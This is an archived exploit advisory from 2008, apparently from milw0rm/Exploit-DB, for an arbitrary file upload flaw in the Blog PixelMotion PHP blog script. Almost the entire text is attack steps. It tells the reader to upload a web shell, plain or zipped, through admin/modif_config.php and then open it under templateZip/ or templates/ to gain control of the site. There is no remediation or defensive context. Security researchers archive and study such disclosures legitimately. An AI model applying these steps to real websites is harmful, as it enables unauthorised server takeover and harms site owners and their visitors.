Blog PixelMotion - 'modif_config.php' Arbitrary File Upload

EDB-ID:

5381

CVE:

N/A


Author:

JIKO

Type:

webapps


Platform:

PHP

Date:

2008-04-06


-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko [jiki team]
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Blog PixelMotion 
# Bug   : Remote File Upload Vulnerability
# Download  : http://www.pixelmotion.org/zip/blog.zip
 
=========================JIkI Team===================
# Exploit  :
uploa your shell  
  http://[Site]/[script]/admin/modif_config.php
http://[Site]/[script]/templateZip/[shell]
###################OR################
upload your shell compressed by Zip forme
  http://[Site]/[script]/admin/modif_config.php
after upload your shell go to
  http://[Site]/[script]/templates/[shell]
because your sheel has extract at templates
and has upload at templateZip
=========================JIKI Team===================
 greetz : all my friend and H-T Team 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-06]